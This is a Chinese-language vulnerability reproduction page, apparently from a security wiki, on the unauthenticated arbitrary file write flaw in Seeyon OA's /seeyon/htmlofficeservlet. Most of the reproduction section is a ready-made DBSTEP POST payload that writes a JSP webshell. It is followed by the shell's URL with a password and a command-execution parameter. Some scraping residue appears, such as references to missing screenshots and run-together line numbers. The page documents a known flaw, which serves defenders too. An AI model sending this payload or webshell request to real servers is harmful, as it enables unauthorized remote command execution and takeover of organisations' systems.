该漏洞最早于6月26号左右,有安全厂商发出漏洞预警。
远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件,写入成功后可执行任意系统命令进而控制目标服务器。
# 网络测绘 # 影响版本# 漏洞复现访问目标站点
/seeyon/htmlofficeservlet 1出现如下图响应,则可能含有漏洞
使用POST请求发出如下请求包
DBSTEP V3.0 355 0666 DBSTEP=OKMLlKlVOPTION=S3WYOSWLBSGrcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66CREATEDATE=wUghPB3szB3Xwg66RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6originalFileId=wV66originalCreateDate=wUghPB3szB3Xwg66FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6needReadFile=yRWZdAS6originalCreateDate=wLSGP4oEzLKAz4=iz=66>a6e4f045d4b8506bf492ada7e3390d7ce 123456789101112出现如图响应则为上传成功,访问
/seeyon/testtesta.jsp?pwd=calsee&cmd=cmd+/c+dir 1 Edit this page(opens new window) 上次更新: 11/8/2023, 6:09:01 AM致远OA A6 createMysql.jsp 数据库敏感信息泄露致远OA A8 status.jsp 信息泄露漏洞
漏洞描述网络测绘影响版本漏洞复现